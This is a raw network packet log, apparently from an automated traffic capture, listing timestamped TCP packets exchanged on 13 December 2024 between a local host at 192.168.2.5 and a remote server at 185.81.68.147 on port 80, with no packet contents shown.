                                                                                                                                                                Dec 13, 2024 01:37:36.150669098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150686026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150708914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150723934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150748014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150763988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150832891 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150840998 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150857925 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150871038 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150887012 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150896072 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150916100 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150923967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151226044 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151235104 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151254892 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151264906 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151276112 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151490927 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151503086 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151524067 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151530981 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151660919 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151668072 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151674986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151681900 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151690960 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151699066 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.151706934 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.152261972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152333021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152359962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152373075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152395010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152409077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152427912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152441978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152465105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152479887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152503967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152517080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152714968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152740955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152755022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152780056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152795076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152818918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152832031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152856112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152868986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152890921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152904034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152925968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152941942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152965069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.152978897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153002977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153018951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153044939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153059006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153079987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153094053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153115034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153206110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153233051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153256893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153331995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153366089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153393030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153474092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153500080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153522968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153592110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153628111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153660059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153687000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153712988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153733969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.153763056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154006004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154043913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154069901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154105902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154197931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154213905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154264927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154290915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154320002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154356003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154508114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154568911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154594898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154619932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154635906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154666901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154720068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154720068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154741049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154764891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154793024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154835939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154885054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.154907942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155169010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155255079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155278921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155306101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155320883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155390024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155411959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155430079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155458927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155472040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155498028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155514956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155539036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155553102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155580997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155786037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155817032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155832052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155859947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155874014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155901909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155916929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155946016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155958891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.155987978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156001091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156027079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156040907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156068087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156081915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156111002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156125069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156151056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156164885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156191111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156205893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156337976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156373978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156389952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156397104 CET8049770185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.156478882 CET4977080192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156510115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156524897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156610966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156645060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156666994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156730890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156744957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156779051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156794071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156816959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156830072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156861067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.156883001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157079935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157119036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157135010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157162905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157176971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157202005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157217026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157248020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157260895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157288074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157301903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157326937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157356024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157370090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157391071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157416105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157428980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157433987 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157443047 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157454014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157507896 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157524109 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157533884 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157634020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157650948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157674074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157696962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157757044 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157763958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157767057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157797098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157834053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157864094 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157872915 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157891035 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157898903 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157927036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157963037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157970905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.157987118 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.157991886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158083916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158098936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158118963 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158137083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158138037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158164024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158165932 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158185005 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158189058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158195019 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158212900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158243895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158265114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158301115 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158344030 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158351898 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.158467054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158500910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158516884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158544064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158561945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158587933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158598900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158626080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158639908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158668995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158682108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158706903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158721924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158746958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158759117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158787966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158801079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158828974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158938885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158966064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.158982038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159003973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159064054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159089088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159106970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159138918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159198999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159224033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159238100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159270048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159331083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159357071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159372091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159399033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159413099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159437895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159451008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159476042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159490108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159521103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159706116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159737110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159748077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159776926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159790039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159820080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159835100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159861088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159874916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159900904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159914017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159941912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159955978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159981012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.159996033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160028934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160044909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160171032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160185099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160213947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160281897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160312891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160326958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160351992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160407066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160432100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160446882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160475016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160531998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160557032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160576105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160600901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160614014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160636902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160651922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160677910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160695076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160866022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160881042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160907030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.160923004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.164793968 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.166872978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.166930914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.166930914 CET4977580192.168.2.5185.81.68.147
